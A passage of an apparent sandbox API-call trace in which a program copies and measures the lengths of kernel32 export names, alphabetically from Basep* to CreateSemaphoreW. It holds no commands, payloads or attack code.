returned="BasepAnsiStringToDynamicUnicodeString" [0086.365] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.365] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.365] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.365] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.365] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.365] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.365] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.365] lstrlenA (lpString="BEEP") returned 4 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.366] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.366] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.366] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.366] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.366] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.366] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.366] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.366] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.366] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.366] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.366] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.366] lstrlenA (lpString="CANCELIO") returned 8 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.366] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.366] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.366] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.366] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.366] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.366] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.367] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.367] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.367] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.367] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.367] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.367] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.367] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.367] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.367] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.367] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.367] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.367] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.367] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.367] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.367] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.367] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.367] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.367] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.368] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.368] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.368] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.368] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.368] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.368] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.368] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.368] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.368] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.368] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.368] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.368] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.368] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.368] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.368] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.368] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.368] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.368] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.369] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.369] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.369] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.369] lstrlenA (lpString="COPYFILEA") returned 9 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.369] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.369] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.369] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.369] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.369] lstrlenA (lpString="COPYFILEW") returned 9 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.369] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.369] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.369] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.369] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.369] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.369] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.369] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.369] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.369] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.370] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.370] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.370] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.370] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.370] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.370] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.370] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.370] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.370] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.370] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.370] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.370] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.370] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.370] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.370] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.370] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.370] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.371] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.371] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.371] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.371] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.371] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.371] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.371] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.371] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.371] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.371] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.371] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.371] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.371] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.371] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.371] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.371] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.371] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.371] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.372] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.372] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.372] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.372] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.372] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.372] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.372] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.372] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.372] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.372] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.372] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.372] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" 